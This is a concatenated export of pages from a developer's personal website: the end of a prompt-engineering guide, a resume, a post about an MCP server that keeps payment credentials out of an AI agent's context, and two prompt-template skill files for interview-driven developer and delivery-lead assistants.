is missing the 'email' field.
Explain the root cause and
suggest a fix that handles
missing keys gracefully.
```
Mistake Over-specifying a persona with a paragraph of background. "You are an expert who has worked for 20 years in enterprise systems across multiple Fortune 500 companies and has deep knowledge of..." Fix
```
You are a senior database
performance engineer.
```
One line. The model doesn't need a resume. Mistake Providing 10 few-shot examples when 2-3 would establish the pattern. Fix 2-3 representative examples. Cover the main case and one edge case. Diminishing returns hit fast.
### Sources
| Paper || Pattern || Citation |
| Prompt Pattern Catalog || Persona, Few-shot, Template, 16+ patterns || White et al. (2023) -- arXiv 2302.11382 |
| Few-Shot Learners || Few-shot prompting || Brown et al. (2020) -- arXiv 2005.14165 |
| Chain-of-Thought || Step-by-step reasoning || Wei et al. (2022) -- arXiv 2201.11903 |
| ReAct || Reasoning + Acting loops || Yao et al. (2022) |
| Tree of Thoughts || Multi-branch evaluation || Yao et al. (2023) |
| Architecture Decision Records || Systematic prompt organization || Nygard (2011) |
Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [advanced patterns → ]()· [guardrails → ]()[.md ]()
---
# resume.md
# https://jrlopez.dev/p/resume.html
---
title: "Resume"
description: "Sr. Data Engineer — 5 years financial services."
author: "Joey Lopez"
date: "2026-03-24"
tags: ["reference"]
atom_id: 22
source_html: "resume.html"
url: "https://jrlopez.dev/p/resume.html"
generated: true
---
[← jrlopez.dev ]()
# Joseph Lopez Sr. Data Engineer · AI Researcher Milwaukee, WI · [josephrobertlopez@gmail.com ]()· [jrlopez.dev ]()· [github ]()· [linkedin ]()Summary Data engineer who publishes security research. I proved regex safety filters are algebraically blind (peer-reviewed, 2026) and built data pipelines handling 10,000+ datasets with zero consumer disruption. Five years across financial services — migrations, streaming, agentic systems. I like hard problems and tend to document what I learn. Research & Side Projects Algebraic and Computational Limits of LLM Guardrails Proved regex safety filters are algebraically blind to modular-position encodings via syntactic monoid analysis. 91 production patterns analyzed, 34/35 aperiodic. Peer-reviewed, 2026. [pdf ]()[repo ]()[teaching materials ]()Experience Senior Data Engineer — Platform & Integration Sep 2024 – Present Financial Services (Milwaukee, WI)
- Wiring an acquired institution's personal loans product into the parent platform — real-time data feeds, payment processor history, GraphQL data product interlinking
- Designed an Airflow + config-as-code pipeline that moved **10,000+ payment processor datasets **during post-M&A integration; full audit trail throughout
- Replaced shell script ETL with production-grade infrastructure from scratch — **250 dataset migrations, zero consumer disruption **; release velocity jumped from 1–10 to 20–25 datasets per cycle
- Modernized 3 Databricks batch jobs covering 32 compliance datasets; config-driven validation toolkit cut dataset validation from 3 min → 30 sec ( **~62 hours manual work eliminated **)
- Docker runtime workflows across 7 repos — saved **14+ person-days in 2 weeks **; one of 7 engineers selected for org-wide AI coding pilot
- Developed a spec-driven development methodology — **66% velocity increase **, adopted org-wide Senior Application Developer — Product Engineering Jan 2024 – Aug 2024 Financial Services (Milwaukee, WI)
- Shipped credit-freeze data flow end-to-end across a distributed decision system
- Built a test-vetted UI for credit policy modelers — cut prototyping time from days to hours
- Found and fixed a Kafka consumer test suite that was passing without ever validating data — those tests were blind for months
- Led PySpark 2→3 migration of a production AWS Step Function ETL pipeline with no downtime AI Engineering & Developer Experience Oct 2025 – Present Financial Services — Data Products / Platform
- Built a LangGraph multi-agent POC for developer onboarding — handles API discovery, schema comprehension, and code generation in a single workflow; cuts "how does this API work" from hours to minutes
- Designed and ran a Prompt Engineering Bootcamp — 2 sessions, 15 engineers, 7 patterns; published all materials as open-source teaching resources
- Mentored 2 junior devs — both shipped production-ready workflows independently within a month Application Developer — Data Engineering Aug 2021 – Dec 2023 Financial Services (Milwaukee, WI)
- Built data streaming pipelines, implemented a DMN rules engine, and drove schema modernization across multiple platforms
- Designed multitenancy schema and data exhaust architecture for ETL pipelines Skills AI/Agentic: LangGraph, Multi-Agent Architectures, MCP, spec-driven development Python: Pytest, Pandas, PySpark, Airflow, LangGraph, Jupyter Java: Spring Boot, JUnit, Mockito, Microservices, Cucumber, Maven Go: Concurrency, goroutines, HTTP handlers, CLI tooling Scala: Spark Tools: SQL, AWS, GCP, Docker, OpenAPI, Splunk, GitHub, Jira, Confluence, Tableau, Claude Code, Windsurf Education & Certifications B.S. Computer Science / Machine Learning — UC Irvine 2020 · 3.48 GPA AWS Cloud Practitioner · GCP Associate Cloud Engineer Export PDF Export DOCX
---
# secrets-router.md
# https://jrlopez.dev/p/secrets-router.html
---
title: "I Taught Claude to Pay My Water Bill"
description: "My card number ended up in the AI context window. So I built a credential isolation layer."
author: "Joey Lopez"
date: "2026-03-26"
tags: ["code", "security"]
atom_id: 27
source_html: "secrets-router.html"
url: "https://jrlopez.dev/p/secrets-router.html"
generated: true
---
[← jrlopez.dev ]()
# I Taught Claude to Pay My Water Bill Then my card number ended up in its context window. So I built a tool. March 2026 I asked my AI agent to pay my water bill. It did. $212.54 to Milwaukee Water Works, confirmation number and everything. Then I checked the conversation log. My full credit card number was sitting in plaintext inside the LLM's context window. The model had seen everything — card number, CVV, expiration. All of it logged in the session transcript.
## The Problem If a credential passes through the model to reach the browser, the model has seen it. Period. No prompt engineering fixes this. The value is in the context window, in the tool call history, potentially in logs. The standard approach — "don't let agents handle credentials" — means agents can't do anything useful with real money, real accounts, or real APIs. That's not a solution. It's an avoidance.
## The Insight The fix isn't policy ("please don't remember my card number"). It's architecture. You need a **process boundary **between the agent and the credential values.
```
encrypted store ──→ secrets-router ──→ browser field
│
agent sees only:
handle:a3f8c2d1...
****1017
```
The agent sends a credential *reference *("use my primary card's number"). A separate process resolves it and fills the browser field directly via [Chrome DevTools Protocol ](). The value goes: Bitwarden → server memory → browser DOM. Zero agent hops.
## What I Built [secrets-router ]()is an MCP server (~800 lines) that does three things:
- **Opaque handles. **secure_fetch("rbw", "primary card", "number")returns handle:a3f8c2d1. The agent sees the handle. Never the value.
- **CDP fill. **secure_fill(handle, "#card-number")resolves the handle inside the server process and fills the browser field via WebSocket. The agent sees "filled [MASKED ****1017]".
- **YAML recipes. **Multi-step workflows (navigate → fill → click → secure_fill → approve → submit) defined in YAML. The agent calls one tool. The server runs the whole flow.
## The Human-Teaches-Once Pattern **First time: **You do it manually while the agent watches. You say which fields are sensitive and which Bitwarden item to use. The agent generates a recipe. **Second time: **The agent runs the recipe. You approve at the payment gate (screenshot + "confirm $216.68?"). **Every time after: **Autonomous. Confirmation number in your inbox.
## How the CDP Bridge Works The hardest part was getting the credential from the MCP server into Playwright's browser without it passing through Claude's context. The MCP server and Playwright MCP are separate processes — they can't share memory. The solution: Chrome's --remote-debugging-portflag exposes a WebSocket endpoint. Any process can connect and execute JavaScript on the page:
```
# Find Playwright's browser
port = find_cdp_port() # scans process args
# Connect via WebSocket
ws = connect(f"ws://localhost:{port}/devtools/page/...")
# Fill the field — value never leaves this process
ws.send(Runtime.evaluate(
`document.querySelector('#card').value = '${card_number}'`
))
```
The card number exists only inside the _cdp_fill_field()function scope. After the field is filled, the variable goes out of scope. The MCP tool returns only {"status": "filled", "masked": "****1017"}.
## The Recipe Format
```
credentials:
card:
store: rbw
item: "primary card"
fields:
number: number
cvv: cvv
steps:
- action: navigate
url: https://paywater.milwaukee.gov
- action: secure_fill
target: { selector: 'input[name="card"]' }
credential: card.number
percept: "filled: Card [MASKED ****${card.number|last4}]"
- action: await_approval
message: "Confirm payment of ${extract.total}?"
- action: click
target: { text: "Make a Payment" }
```
The recipe contains credential *references *, never values. Safe to commit to git. Safe to share. The agent reads the recipe, executes it, and sees only masked percepts at every step.
## What's In the Repo
- server.py— MCP server with handle store, 5 credential backends, CDP fill
- engine.py— Recipe execution engine with approval gates
- actuators/playwright_cdp.py— Browser automation via Chrome DevTools Protocol
- recipes/— YAML recipe examples (bill pay, login, API call)
- skills/— 6 Claude Code skills (record, validate, debug, test, audit) Supports [rbw ](), [Bitwarden CLI ](), [pass ](), age-encrypted YAML, and environment variables as credential backends. [github.com/josephrobertlopez/secrets-router ]()— MIT license, ~800 lines, zero frameworks. Joey Lopez · 2026 [.md ]()
---
# skills-dev-second-brain.md
# https://jrlopez.dev/p/skills-dev-second-brain.md
---
name: dev-second-brain
description: Developer second brain — interrogation-driven code assistance using systematic patterns (ReAct, spec-kit)
version: 1.0
---
# Developer Second Brain Skill
## Overview
The **Developer Second Brain** is an expert assistant that guides developers through complex code challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about your codebase before suggesting changes
2. **Structure gets rewarded** — Uses structured output (plans, diffs, tests) instead of loose prose
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for your codebase and team conventions
This skill enables developers to tackle:
- ✅ Code migrations (framework upgrades, language version bumps)
- ✅ Refactoring (extract service, decompose monolith)
- ✅ New feature implementation with existing conventions
- ✅ Systematic debugging approaches
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating code using a **20-question style interview** adapted for developers:
- **Codebase Context**: Framework, language version, architecture pattern
- **Target State**: Migration target, acceptance criteria, success metrics
- **Dependencies**: External libraries, team integrations, data pipelines
- **Test Coverage**: Existing test patterns, testing conventions
- **Team Conventions**: Naming, error handling, logging standards
### 2. ReAct Pattern Implementation
Generates migration plans with **THINK → ACT → OBSERVE** annotations:
```
THINK: What's the constraint here? (Analysis phase)
ACT: Here's the code change (Implementation)
OBSERVE: How do we verify? (Testing/validation)
```
### 3. Structured Output Formats
- **Implementation Plan**: Step-by-step with ReAct annotations
- **Code Diffs**: Side-by-side before/after with reasoning
- **Test Strategy**: Unit, integration, regression test cases
- **Checklist**: Verification steps before merge
---
## Usage Scenarios
Choose the scenario matching your current task:
### **Scenario A: Code Migration**
*Framework upgrade, language version bump, major dependency migration*
**When to use**: "I need to migrate from Framework A to B"
**What you'll get**: Migration plan, code diffs, test strategy, rollback plan
### **Scenario B: Refactoring**
*Extract service, decompose monolith, improve testability*
**When to use**: "I need to refactor this component"
**What you'll get**: Refactoring goals, dependency map, extraction plan, test approach
### **Scenario C: Feature Implementation**
*New feature using existing codebase conventions*
**When to use**: "I need to implement a new feature following our patterns"
**What you'll get**: Feature spec, code stubs with TODOs, test outline, integration points
### **Scenario D: Systematic Debugging**
*Track down root cause of production issue*
**When to use**: "I need to debug this systematic issue"
**What you'll get**: Hypothesis, investigation steps, diagnostic queries, solution options
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Current State Analysis (5-7 questions)
1. **Language & Framework**: What language/framework + version? (e.g., Python 3.11 + Django 4.2)
2. **Architecture Pattern**: What's the overall pattern? (Monolith, microservices, event-driven, layered?)
3. **Current Problem**: What specifically needs to change? (One sentence)
4. **Scope**: Is this one file, one module, or multiple services?
5. **Team Size**: How many developers? What's your role? (Individual contributor, tech lead, etc.)
### Phase 2: Target State Definition (3-4 questions)
6. **Success Criteria**: How will you know it's working? (Metrics, tests, deployment success?)
7. **Constraints**: Any hard constraints? (No downtime, budget limits, timeline?)
8. **Dependencies**: What other systems does this touch?
### Phase 3: Implementation Context (3-4 questions)
9. **Test Coverage**: Do you have existing tests? What's the pattern? (Unit, integration, e2e?)
10. **Team Conventions**: What's the naming convention? Error handling pattern? Logging standard?
11. **Review Process**: What does code review look like? (Automated checks, approval gates?)
12. **Rollback Plan**: What's your safety net if something goes wrong?
### Phase 4: Knowledge Gathering (2-3 questions)
13. **Similar Changes**: Have you done something like this before?
14. **Tribal Knowledge**: What does every developer wish they knew about this codebase?
15. **Decision Log**: Are there decisions that limit how you can change this?
---
## Output Format Specification
### 1. Implementation Plan with ReAct
```
## Migration Plan: [Component] from [Old] to [New]
### Phase 1: Preparation
**THINK**: What needs to be true before we start?
- [ ] Dependencies installed
- [ ] Tests passing
- [ ] Backup created
- [ ] Team notified
**ACT**: Run these commands:
\`\`\`bash
# Setup steps with exact commands
\`\`\`
**OBSERVE**: Verify with:
\`\`\`bash
# Verification commands
\`\`\`
### Phase 2: Core Change
**THINK**: What's changing and why?
- Breaking change X affects Y consumers
- New API requires Z configuration
- Database migration needed for schema
**ACT**: Apply these changes:
\`\`\`diff
- old_code()
+ new_code()
\`\`\`
**OBSERVE**: Test coverage:
- [ ] Unit test for new_code()
- [ ] Integration test for X→Y flow
- [ ] No regression in unchanged code
### Phase 3: Verification
**THINK**: How do we know this is safe?
**ACT**: Run full test suite
**OBSERVE**: Success criteria met
```
### 2. Code Diff with Annotations
```python
# THINK: Why are we changing this class?
# - Needs to support async operations
# - Current implementation blocks on I/O
# - Caller expects non-blocking behavior
# ACT: Before
class DataFetcher:
def get_data(self, url):
return requests.get(url).json()
# ACT: After
class DataFetcher:
async def get_data(self, url):
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
return await response.json()
# OBSERVE: Test this change:
# - Unit test: mock async response, verify await
# - Integration test: real async flow, verify non-blocking
# - Regression: old caller code still works (adapter if needed)
```
### 3. Test Strategy Matrix
```
| Component | Test Type | Approach | Coverage |
|-----------|-----------|----------|----------|
| DataFetcher | Unit | Mock async response | get_data returns parsed JSON |
| UserService | Integration | Real async client | User creation flow with I/O |
| API Handler | E2E | Load test | 100 concurrent requests |
| Rollback | Regression | Before/after comparison | No breaking changes |
```
### 4. Verification Checklist
```
## Pre-Deployment Checklist
### Code Quality
- [ ] Tests pass (unit + integration + e2e)
- [ ] Code review approved by [person/team]
- [ ] No new warnings in linter/type checker
- [ ] No security issues in dependency scan
- [ ] Documentation updated
### Performance & Stability
- [ ] Load test shows no degradation
- [ ] Error handling covers edge cases
- [ ] Logging added for debugging
- [ ] Monitoring/alerting updated
### Rollback Safety
- [ ] Rollback plan documented
- [ ] Migration is reversible (if database changes)
- [ ] Feature flag allows instant disable
- [ ] Previous version can run in parallel if needed
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to migrate from Python 3.9 to 3.12"
→ Scenario A (Code Migration)
"Our monolith is 50K lines, time to extract services"
→ Scenario B (Refactoring)
"Build user authentication module following our patterns"
→ Scenario C (Feature Implementation)
"Production is slow, need to find root cause"
→ Scenario D (Systematic Debugging)
```
### Step 2: Let the Skill Interrogate
The skill will ask 12-15 questions. **Answer fully** — this is where context richness happens.
Example interrogation flow:
```
Q1: What language/framework?
A: Python 3.9 with Django 3.2
Q2: What's the architecture pattern?
A: Monolithic Django app with background workers via Celery
Q3: What needs to change?
A: Move to Python 3.12 and Django 5.0, async views
Q4: Scope?
A: All 47 views in main app, plus celery tasks
Q5: How many developers?
A: Team of 5, I'm tech lead
[... continues through all 15 questions ...]
```
### Step 3: Review Generated Plan
The skill will output:
- ✅ Implementation plan with phases
- ✅ Code diffs with THINK/ACT/OBSERVE annotations
- ✅ Test strategy matrix
- ✅ Verification checklist
### Step 4: Execute with Confidence
Follow the plan step-by-step, using the checklist to verify each phase.
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate code without understanding:**
- What problem does this solve?
- What constraints exist?
- What conventions must be followed?
- What could break?
The interrogation phase ensures we have rich context before any code.
### Principle 2: Structure Over Prose
**Always output:**
- Structured plans (not narratives)
- Checklists (not suggestions)
- Diffs (not rewrites)
- Test cases (not "should work")
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Verification by Default
**Every change includes:**
- Why we're making it (THINK)
- The actual change (ACT)
- How to verify it works (OBSERVE)
ReAct pattern enforces safety.
### Principle 4: Team Conventions Matter
**Always respect:**
- Naming conventions
- Error handling patterns
- Logging standards
- Code review process
This is where interrogation questions pay dividends.
---
## Example: Complete Workflow
### Scenario: Feature Implementation
**You say:**
```
I need to add a new Payment Processing module to our existing system.
It should accept credit card and PayPal payments.
I want to follow our team's conventions.
```
**Skill interrogates (Phase 1: Current State):**
```
Q1: Language/framework?
→ "Python 3.11 + FastAPI"
Q2: Architecture?
→ "Microservices, async-first design"
Q3: Current structure?
→ "Other modules are in /services/, each with models.py, routes.py, tests/"
Q4: Scope?
→ "New module only, but touches Order service"
```
**Skill interrogates (Phase 2: Target State):**
```
Q5: Success criteria?
→ "Process payments, return confirmation, handle failures gracefully"
Q6: Constraints?
→ "No external payment service downtime allowed, must be testable"
Q7: Dependencies?
→ "Order service, Customer service, audit log service"
```
**Skill interrogates (Phase 3: Implementation Context):**
```
Q8: Test pattern?
→ "Pytest, mock external APIs, use fixtures for common objects"
Q9: Team conventions?
→ "Snake_case functions, async/await required, error logging with structured JSON"
Q10: Code review?
→ "PR requires approval + CI tests passing"
```
**Skill generates: Implementation Plan**
```markdown
## Payment Processing Module Implementation
### Phase 1: Setup
**THINK**: What's the minimal skeleton?
- FastAPI router
- Database models
- External API clients
**ACT**:
\`\`\`python
# services/payment_processing/models.py
from sqlalchemy import Column, String, Float, DateTime
from datetime import datetime
class Payment(Base):
__tablename__ = "payments"
id = Column(Integer, primary_key=True)
order_id = Column(Integer, ForeignKey("orders.id"))
amount = Column(Float)
provider = Column(String) # credit_card, paypal
status = Column(String) # pending, completed, failed
created_at = Column(DateTime, default=datetime.utcnow)
# services/payment_processing/routes.py
from fastapi import APIRouter, HTTPException
import logging
router = APIRouter(prefix="/payments")
logger = logging.getLogger(__name__)
@router.post("/process")
async def process_payment(order_id: int, provider: str, amount: float):
"""Process payment through specified provider"""
# TODO: Validate input
# TODO: Call provider API
# TODO: Update Payment record
# TODO: Notify Order service
# TODO: Log with structured JSON
pass
# services/payment_processing/tests/test_routes.py
import pytest
from unittest.mock import patch, AsyncMock
@pytest.mark.asyncio
async def test_process_payment_success():
# TODO: Mock payment provider
# TODO: Assert payment recorded
# TODO: Assert order service notified
pass
@pytest.mark.asyncio
async def test_process_payment_provider_failure():
# TODO: Mock provider error
# TODO: Assert graceful failure
# TODO: Assert retry logic
pass
\`\`\`
**OBSERVE**: Verify structure exists:
\`\`\`bash
ls -la services/payment_processing/
# Should show: models.py, routes.py, tests/, __init__.py
pytest services/payment_processing/tests/ -v
# All tests should run (though skip actual implementations)
\`\`\`
```
**Skill generates: Code Diffs with Annotations**
```python
# THINK: Why do we need payment provider abstraction?
# - Support multiple providers (credit card, paypal, etc.)
# - Swap providers without changing business logic
# - Easy to test with mocks
# - Follows team's dependency injection pattern
# ACT: Before (monolithic payment)
def process_payment(order_id, card_number, cvv, amount):
response = requests.post("https://api.stripe.com/...", ...)
if response.status == 200:
update_order(order_id, "paid")
return response
# ACT: After (provider abstraction)
class PaymentProvider:
async def charge(self, amount: float) -> PaymentResult:
raise NotImplementedError
class StripeProvider(PaymentProvider):
async def charge(self, amount: float) -> PaymentResult:
result = await self.client.create_charge(amount=amount)
return PaymentResult(success=result.status == "succeeded", ...)
class PayPalProvider(PaymentProvider):
async def charge(self, amount: float) -> PaymentResult:
result = await self.client.create_payment(amount=amount)
return PaymentResult(success=result.state == "approved", ...)
async def process_payment(order_id: int, provider: PaymentProvider, amount: float):
"""Route payment through appropriate provider"""
result = await provider.charge(amount)
if result.success:
logger.info("payment_processed", extra={
"order_id": order_id,
"amount": amount,
"provider": provider.__class__.__name__
})
await order_service.mark_paid(order_id)
else:
logger.error("payment_failed", extra={
"order_id": order_id,
"reason": result.error
})
raise PaymentException(result.error)
return result
# OBSERVE: This design enables:
# - Unit test: mock PaymentProvider, verify logic
# - Integration test: real Stripe test account
# - Easy to add new provider: just implement interface
# - Follows team's dependency injection convention
```
**Skill generates: Test Strategy**
```
| Component | Test Type | Approach | Coverage |
|-----------|-----------|----------|----------|
| PaymentProvider (abstract) | Unit | Mock all implementations | Interface contract |
| StripeProvider | Unit | Mock Stripe API | charge() returns correct result |
| PayPalProvider | Unit | Mock PayPal API | charge() returns correct result |
| process_payment() | Unit | Mock providers | Success path, failure path |
| process_payment() + Order svc | Integration | Real test database, mock payment APIs | Full workflow |
| /process endpoint | E2E | Load test against test environment | 1000 concurrent requests |
```
**Skill generates: Verification Checklist**
```
## Pre-Merge Checklist
### Code Quality
- [ ] All tests pass: pytest services/payment_processing/
- [ ] Type checking passes: mypy services/payment_processing/
- [ ] Code review approved by [peer]
- [ ] No security issues (no hardcoded credentials, etc.)
- [ ] README added to explain module
### Functionality
- [ ] Happy path works: successful payment
- [ ] Error path works: provider failure handled
- [ ] Retry logic works: transient failures retry
- [ ] Audit logging works: all transactions logged with JSON
- [ ] Order service integration: payment status reflected
### Safety
- [ ] Rollback plan: Can disable module with feature flag
- [ ] No database migration needed (using base SQLAlchemy)
- [ ] Monitoring added: alert on payment failures
- [ ] Can run alongside old payment system
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map your development work to ABCD:
```
Action: Implement payment processing module (your feature)
Behavior: 100% test coverage, follows team conventions
Context: Supports multiple payment providers
Delivered: Rollback-safe, production-ready code
```
### Using with ReAct Pattern
Systematically debug production issues:
```
THINK: What could cause this error? (Hypothesis generation)
ACT: Add logging here, check this metric (Investigation)
OBSERVE: Does hypothesis hold? (Verification)
```
### Using with Tree of Thoughts
Complex architecture decisions:
```
Generate: Multiple refactoring approaches (extract service A, B, or C?)
Evaluate: Which respects team conventions best?
Choose: Option B because it aligns with event-driven pattern
```
---
## When to Use This Skill vs. IDE
| Task | Use IDE | Use Skill |
|------|---------|-----------|
| Syntax autocomplete | ✅ IDE | ❌ Overkill |
| Quick bug fix | ✅ IDE | ❌ Overkill |
| Variable rename across file | ✅ IDE refactoring | ❌ Use IDE |
| **Migrate framework** | ❌ Too complex | ✅ **This skill** |
| **Refactor large component** | ❌ Too many decisions | ✅ **This skill** |
| **New feature matching patterns** | ❌ Need context | ✅ **This skill** |
| **Root cause debugging** | ❌ Too many unknowns | ✅ **This skill** |
| **Code review for architecture** | ❌ Just guidance | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 2: Advanced Patterns** when discussing:
- ReAct pattern (THINK→ACT→OBSERVE)
- Real-world code examples
- Systematic problem-solving in technical domain
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "Developer" in a role-fork scenario
- You need to implement a feature quickly
- You're new to a codebase and need guidance
- You're debugging a systematic issue
**Expected outcome:**
- Understand how structured interrogation builds context
- See ReAct pattern in action with real code
- Generate production-ready code following team conventions
---
## FAQ
**Q: Will this skill generate all my code for me?**
A: No. It generates structure, plans, and guidance. You write the actual code, guided by the plan and diffs.
**Q: What if I don't know the answers to all 15 interrogation questions?**
A: That's fine! The skill will ask follow-up questions to clarify. The goal is to gather context, not quiz you.
**Q: How is this different from just asking an LLM to write code?**
A: The interrogation phase ensures the code respects your team's conventions, matches your architecture, and solves the actual problem — not a generic version.
**Q: Can I use this for legacy code with no tests?**
A: Yes. The interrogation will help you understand what's there and create a safe refactoring plan.
**Q: What if the skill suggests something that violates my team's standards?**
A: Tell it during interrogation: "Our error handling uses exceptions, not result types." It will adjust.
---
## References
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- **Chain of Thought**: Wei et al. (2022) "Chain-of-Thought Prompting"
- **Few-shot Learning**: Brown et al. (2020) "Language Models are Few-Shot Learners"
- **Prompt Patterns**: White et al. (2023) "A Prompt Pattern Catalog to Enhance Prompt Engineering"
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2
---
# skills-dl-second-brain.md
# https://jrlopez.dev/p/skills-dl-second-brain.md
---
name: dl-second-brain
description: Delivery Lead second brain — interrogation-driven priority building, team scaling, and client delivery using systematic patterns
version: 1.0
---
# Delivery Lead Second Brain Skill
## Overview
The **Delivery Lead Second Brain** is an expert assistant that guides delivery leaders through complex project challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about team, client, project, and business before generating strategies
2. **Structure gets rewarded** — Uses structured output (priorities, risk matrices, status reports) instead of loose narratives
3. **You are the retrieval system** — Acts as an automated knowledge assembly system for project data and team intelligence
This skill enables delivery leaders to tackle:
- ✅ FY26 Priority Building (with ABCD reflections and system-ready CSV output)
- ✅ Team Scaling & Knowledge Capture (onboarding, ADRs, knowledge bases)
- ✅ Client Status Reporting (steering committee materials, risk escalations)
- ✅ Delivery Risk Assessment (systematic risk identification and mitigation)
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating strategies using a **deep-dive interview** adapted for delivery leaders:
- **Team Context**: Size, composition, skill matrix, remote/collocated mix
- **Project Scope**: Budget, timeline, deliverables, success metrics
- **Client Dynamics**: Stakeholder map, decision-making patterns, relationship health
- **Delivery Methodology**: Agile/waterfall/hybrid, ceremonies, cadence
- **Risk Landscape**: Known risks, escalation paths, dependencies
- **Organizational Context**: Portfolio context, competing initiatives, resource constraints
### 2. ReAct Pattern for Delivery
Generates plans and assessments with **THINK → ACT → OBSERVE** annotations:
```
THINK: What's the constraint here? (Analysis phase)
ACT: Here's the recommended action (Decision)
OBSERVE: How do we verify success? (Metrics/monitoring)
```
### 3. Structured Output Formats
- **FY26 Priorities**: CSV format with ABCD reflections and system mapping
- **Risk Assessment Matrix**: Impact/probability with mitigation strategies
- **Status Reports**: RAG status, milestone tracking, escalation summary
- **Team Knowledge Base**: ADR-format team standards and AI workflow documentation
- **Onboarding Plans**: Phased ramp-up with knowledge checkpoints
---
## Usage Scenarios
Choose the scenario matching your current deliverable:
### **Scenario A: FY26 Priority Building**
*Creating performance priorities with ABCD reflections and business alignment*
**When to use**: "I need to build FY26 priorities for my team/program"
**What you'll get**: 3-5 priorities in CSV format (system-ready) with ABCD reflections, metrics, and resource mapping
### **Scenario B: Team Scaling & Knowledge Capture**
*Onboarding plans, ADRs, team knowledge bases for AI workflows*
**When to use**: "I'm onboarding new people or need to codify team knowledge"
**What you'll get**: Phased onboarding plan, ADR templates, knowledge-base structure, AI workflow documentation
### **Scenario C: Client Status Reporting**
*Weekly/monthly status reports, steering committee materials, risk escalations*
**When to use**: "I need to report project health to client/leadership"
**What you'll get**: RAG status summary, milestone tracker, risk escalation, client asks, next-week plan
### **Scenario D: Delivery Risk Assessment**
*Systematic risk identification, impact analysis, mitigation planning*
**When to use**: "I need to systematically identify and mitigate delivery risks"
**What you'll get**: Risk matrix (impact/probability), mitigation strategies, owner/timeline, monitoring approach
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Team & Project Context (6-8 questions)
1. **Team Composition**: How many people? Roles? Remote/collocated? Distributed across time zones?
2. **Project Budget**: Total contract value? Burn rate? Contingency? Budget headroom?
3. **Project Scope**: What are the 3-5 main deliverables? Timeline to completion?
4. **Success Metrics**: How does the client measure success? What are the KPIs?
5. **Delivery Methodology**: Agile (which framework?), waterfall, hybrid? Sprint length?
6. **Current Phase**: Discovery, build, testing, launch, sustain?
### Phase 2: Client & Stakeholder Dynamics (4-5 questions)
7. **Client Stakeholder Map**: Who makes decisions? Decision-making style? (Data-driven, political, consensus?)
8. **Relationship Health**: Client satisfaction level? Any tensions or escalations?
9. **Client Team**: Are they embedded? Do they have capacity to review/approve?
10. **Change Management**: How resistant is the org to the change you're delivering?
### Phase 3: Risk & Dependencies (3-4 questions)
11. **Known Risks**: What keeps you up at night? Top 3 risk items?
12. **Dependencies**: What's blocking progress? External dependencies? Other workstreams?
13. **Escalation Paths**: Who do you escalate to? What's the decision timeline?
14. **Resource Constraints**: Are you resource-constrained? Skills gaps? Competing priorities?
### Phase 4: Organizational Context (2-3 questions)
15. **Portfolio Context**: How does this fit into broader program/portfolio? Interdependencies?
16. **Organizational Readiness**: Is the org ready for this change? Training/change management needed?
17. **Tribal Knowledge**: What does every DL wish they knew about this type of project?
---
## Output Format Specification
### 1. FY26 Priority Building with ABCD
```csv
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Platform Foundation","Implement core platform infrastructure","Complete to 100% test coverage + peer review","Supports all downstream Q2/Q3 features","Production-ready, monitored, documented","[Name]","Jan-Feb","Uptime 99.9%, zero critical defects","Blocks 3 features"
"Q2 Client Portal","Build self-service client dashboard","All client workflows automated","Reduces support load by 40%","Live with 5 pilot clients","[Name]","Feb-Mar","Time-to-insight < 2min, 95% adoption","Early adopter feedback positive"
"Q3 Integration Suite","Connect to 3 third-party systems","All integrations tested and documented","Eliminates manual data entry","Scheduled for Apr launch","[Name]","Mar-May","Data sync < 1hr, zero manual errors","Partner APIs being finalized"
```
**Format notes:**
- Action: What you're doing
- Behavior: How it's done (quality, coverage, standards)
- Context: Why it matters (business impact, dependencies)
- Delivered: What does success look like?
- Owner: Who owns it?
- Timeline: When?
- Metrics: How do you measure?
- Notes: Dependencies, assumptions, risks
### 2. Risk Assessment Matrix with Mitigation
```
## Delivery Risk Assessment: [Project Name]
### Phase 1: Risk Identification
**THINK**: What could go wrong? (Probability × Impact)
- [ ] Technical risks (architecture, complexity, dependencies)
- [ ] Resource risks (skills gaps, availability, turnover)
- [ ] Client risks (stakeholder alignment, change readiness, decision delays)
- [ ] Organizational risks (portfolio conflicts, resource competition, org changes)
- [ ] External risks (vendor delays, regulatory, market)
**ACT**: Risk Matrix
| Risk | Probability | Impact | Score | Mitigation | Owner | Timeline |
|------|-------------|--------|-------|-----------|-------|----------|
| Key vendor API delay | Medium | High | 6 | Establish contingency API layer | [Name] | Week 1 |
| Client lacks technical resources | High | Medium | 5 | Provide technical partner for review | [Name] | Week 1-2 |
| Scope creep from stakeholder requests | High | High | 8 | Establish change control board + baseline | [Name] | Immediate |
| Team capacity for testing phase | Medium | High | 6 | Hire contract QA for weeks 8-12 | [Name] | Week 4 |
**OBSERVE**: Verify mitigation in place:
- [ ] Risk owner assigned to each
- [ ] Mitigation plan has clear first step
- [ ] Timeline is realistic
- [ ] Owner has autonomy to execute
```
### 3. Client Status Report Template
```markdown
## Weekly Status Report: [Project Name]
**Week of**: [Date]
**Reporting to**: [Stakeholder]
**Overall Status**: 🟢 GREEN | 🟡 YELLOW | 🔴 RED
### 1. Milestone Tracker (RAG Status)
| Deliverable | Target Date | Status | Progress | Notes |
|-------------|------------|--------|----------|-------|
